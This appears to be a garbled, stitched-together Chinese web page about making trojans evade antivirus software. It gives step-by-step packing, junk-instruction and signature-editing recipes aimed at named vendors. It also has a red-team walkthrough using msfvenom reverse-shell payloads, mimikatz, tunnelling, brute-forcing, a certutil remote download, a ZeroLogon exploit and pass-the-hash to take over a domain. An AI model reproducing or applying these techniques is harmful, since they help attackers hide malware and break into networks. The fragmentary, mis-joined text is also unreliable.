2024年9月cs免杀木马(如何木马免杀)
⑴cs免杀木马(如何木马免杀
⑵第一步:要想做好木马的免杀,就一定需要了解杀毒软件的特点。木马的免杀通常来说,有两种。一个是被动免杀,一个是主动免杀。所谓被动免杀,就是通过给木马加壳加花来达到免杀的效果,这种方法很简单,但是免杀效果不好,一般只能过表面免杀,而且免杀期很短。所谓主动免杀,就是通过修改木马被杀的特征码来达到免杀的效果,这种方法比较复杂,但是效果很好
⑶选学特征码定位;再学修改;修改又分为代码的修改,字符串的修改,输入表函数的修改,输出表函数的修改。这些都要分别学习的。
⑷去百度上so一下如果拟不想so我可一给你搬过来,如果你想学习免杀技术:.基础的汇编语言.修改工具(不指那些傻瓜式软件).如:OllyDbg.PEditor.CASM.MYL复合特征码定位器.UE.OC.资源器等.还有一些查壳脱壳软件(如:PEIDRL脱壳机等).以下是常用的几种免杀方法及工具:一.要使一个木马免杀,首先要准备一个不加壳的木马,这点非常重要,否则免杀操作就不能进行下去。二.然后我们要木马的内存免杀,从上面分析可以看出,目前的内存查杀,只有瑞星最强,其它杀毒软件内存查杀现在还不起作用所以我们只针对瑞星的内存查杀,要进行内存特征码的定位和修改,才能内存免杀。二.对符其它的杀毒软件,比如江民,金山,诺顿,卡巴.我们可以采用下面的方法,或这些方面的组合使用.》.入口点加免杀法.》.变化入口地址免杀法》.加花指令法免杀法》.加壳或加伪装壳免杀法.》.打乱壳的头文件免杀法.》.修改文件特征码免杀法.第三部分:免杀技术实例演示部分一.入口点加免杀法:.用到工具:PEditor.特点:非常简单实用,但有时还会被卡巴查杀..操作要点:用PEditor打开无壳木马程序,把原入口点加即可.二.变化入口地址免杀法:.用到工具:OllyDbg,PEditor.特点:操作也比较容易,而且免杀效果比入口点加点要佳..操作要点:用OD载入无壳的木马程序,把入口点的前二句移到零区域去执行,然后又跳回到入口点的下面第三句继续执行.最后用PEditor把入口点改成零区域的地址.三.加花指令法免杀法:.用到工具:OllyDbg,PEditor.特点:免杀通用性非常好,加了花指令后,就基本达到大量杀毒软件的免杀..操作要点:用OD打开无壳的木马程序,找到零区域,把我们准备好的花指令填进去填好后又跳回到入口点,保存好后,再用PEditor把入口点改成零区域处填入花指令的着地址.四.加壳或加伪装壳免杀法:.用到工具:一些冷门壳,或加伪装壳的工具,比如木马彩衣等..特点:操作简单化,但免杀的时间不长,可能很快被杀,也很难躲过卡巴的追杀..操作要点:为了达到更好的免杀效果可采用多重加壳,或加了壳后在加伪装壳的免杀效果更佳.五.打乱壳的头文件或壳中加花免杀法:.用到工具:秘密行动,UPX加壳工具..特点:操作也是傻瓜化,免杀效果也正当不错,特别对卡巴的免杀效果非常好..操作要点:首先一定要把没加过壳的木马程序用UPX加层壳,然后用秘密行动这款工具中的SCramble功能进行把UPX壳的头文件打乱,从而达到免杀效果.六.修改文件特征码免杀法:.用到工具:特征码定位器,OllyDbg.特点:操作较复杂,要定位修改一系列过程,而且只针对每种杀毒软件的免杀,要达到多种杀毒软件的免杀,必需修改各种杀毒软件的特征码.但免杀效果好..操作要点:对某种杀毒软件的特征码的定位到修改一系列慢长过程.第四部分:快速定位与修改瑞星内存特征码一.瑞星内存特征码特点:由于技术原因,目前瑞星的内存特征码在%以上把字符串作为病毒特征码,这样对我们的定位和修改带来了方便.二定位与修改要点:》.首先用特征码定位器大致定位出瑞星内存特征码位置》.然后用UE打开,找到这个大致位置,看看,哪些方面对应的是字符串,用替换后再用内存查杀进行查杀.直到找到内存特征码后,只要把字符串的大小写互换就能达到内存免杀效果.第五部分:木马免杀综合方案修改内存特征码---》》入口点加免杀法---》》加压缩壳---》》再加壳或多重加壳》变化入口地址免杀法》加成僻壳》加壳的伪装.》加花指令法免杀法》打乱壳的头文件》修改文件特征码免杀法注:这个方案可以任意组合各种不同的免杀方案.并达到各种不同的免杀效果.第六部分:免杀方案实例演示部分.完全免杀方案一:内存特征码修改+加UPX壳+秘密行动工具打乱UPX壳的头文件..完全免杀方案二:内存特征码修改+加压缩壳+加壳的伪装.完全免杀方案三:内存特征码修改+修改各种杀毒软件的文件特征码+加压缩壳.完全免杀方案四:内存特征码修改+加花指令+加压壳.完全变态免杀方案五:内存特征码修改+加花指令+入口点加+加压缩壳UPX+打乱壳的头文件还有其它免杀方案可根据第五部分任意组合
⑸CS起源被查出后门木马,是真有病毒,还是误报,请详细的告诉我
⑹一般应该是误报。CS在安装过程中。由于引进了暂时无法是别的文件、默认为病毒、但也不排除是病毒的可能、你并必须保证你的游戏是无毒的。我建议你去多特软件站去下载、CS.、.都有、并且无毒!请楼主采纳~!
⑺免杀,也就是反病毒(AntiVirus与反间谍(AntiSpyware的对立面,英文为Anti-AntiVirus(简写VirusAV,逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。免杀分为手工免杀和开源免杀。手工免杀即为特征码免杀和无特征码免杀,特征码免杀就是通过定位找到特征码然后进行修改达到免杀效果,无特征码免杀就是通过加壳加花改壳达到免杀效果,但是对于国外的杀软查杀,一般都是杀在输入表上,这种时候只能进行无特征码免杀,对输入表进行重建和隐藏,手工免杀的免杀时间不长。开源免杀就是得到木马的源代码进行修改,通常先进行定位特征码然后进行修改,当定位到字符串时只要加nop就好,但是对于查杀在查杀注入表的地方就可以进行动态调用,还有什么不明白可以加我QQ
⑻安全攻防实战系列MSF
⑼前言在红队攻防中,我们主要在外网进行信息收集,通过cms或者其他漏洞拿到shell,之后通过免杀木马将windows或linux服务器上线到cobaltstrike或msf等c服务器,之后对内网进行信息收集并绘制网络拓扑图,进行工作组或域渗透,拿到各个网段机器的权限,远程登陆并截图证明。环境配置从虚拟机网络来看机器描述目录如下蚁剑拿shellmsf免杀拿shell使用msfvenom生成免杀木马payload,里面的IP和端口自行修改,就是反弹shell的kali使用分离免杀工具生成loader.exe文件对生成的exe文件进行加壳免杀免杀效果如下免杀之后通过蚁剑上传到server-bt上msf开启监听蚁剑运行getuidpsmsf内网渗透loadmimikatz#加载Mimikatz模块成功开启了远程桌面,并且生成了一个txt文件,这个txt文件往后可用来关闭远程桌面,关闭命令runmulti_console_mand-r/root/.msf/loot/xx_default_..._host.windows.cle_xxx.txt绕过火绒添加用户蚂蚁剑或者cs上传添加用户.exe远程登录server-bt然后再添加一个由system权限下开启的桌面进程Earthworm穿透上传EW(Earthworm到C:/wwwroot/kali环境进行爆破proxychainshydra-P/usr/xxx/password.lst...redis利用过程代理蚁剑进行连接这个shell并查看权限Earthworm穿透挂代理,通过之前上传的EW(Earthworm服务器端执行以下命令(关掉server-bt的防火墙代理才能生效)executeC:wwwrootew.exe-sssocksd-l用msfvenom生成一个正向马传进去(因为无法访问外网,反向出不来,msf正向连接。使用分离免杀工具生成loader.exe文件免杀效果如下C:ProgramDataxxxx.exe-i-c“certutil-urlcache-split-fps添加账户和远程连接同第一层loadmimikatz#加载Mimikatz模块这里已经满足触发zerologon的两个条件,能ping通域控制器,知道域控计算机名,当然最后dump出域内所有hash的时候需要域名置空域控机器用户NTLMhashproxychainspythoncve---exploit.pyserver-dc$...接下来用置空的机器账户dump所有hash(c这个hash就是“空“的NTMLhash我们的目标是获得域内administrator的hash,然后就可以hash传递,登陆任意域内机器利用psexec(PTH)上线server-dc到MSF:成功获取到shell利用psexec上线server-ex到MSF:
⑽免杀——顾名思义就是能避免被杀。免杀木马就是能不让杀软识别为恶意代码的木马。木马经过加壳后(可能不止一次,加壳算法也可能不止一种能不被某些(可能所有安全软件(靠特征码分析发现,就成了免杀木马。不过这种免杀只是相对的,如果安全厂家得到恶意代码,就会分析,然后更新特征库(病毒库就可以查杀。如果你用的是HIPS,那就基本不怕,因为不管恶意代码如何隐藏,最后都会露出真面目——调用相关的函数(来攻击,然后被HIPS拦截。但是如果恶意代码利用了系统漏洞(例如利用系统对特殊数据错误分析所造成溢出等等来进行攻击,那就麻烦了(*^__^*)嘻嘻……如果你遇到了很新的木马或者传播不广的木马,杀软可能查不出(因为还没有对应的特征码。为了解决这种情况,各安全厂家都在想办法,常见的有启发式扫描和智能HIPS。(貌似卡巴斯基实验室有一种新的东东,能更快的找到恶意代码的源头,好像会在卡巴里用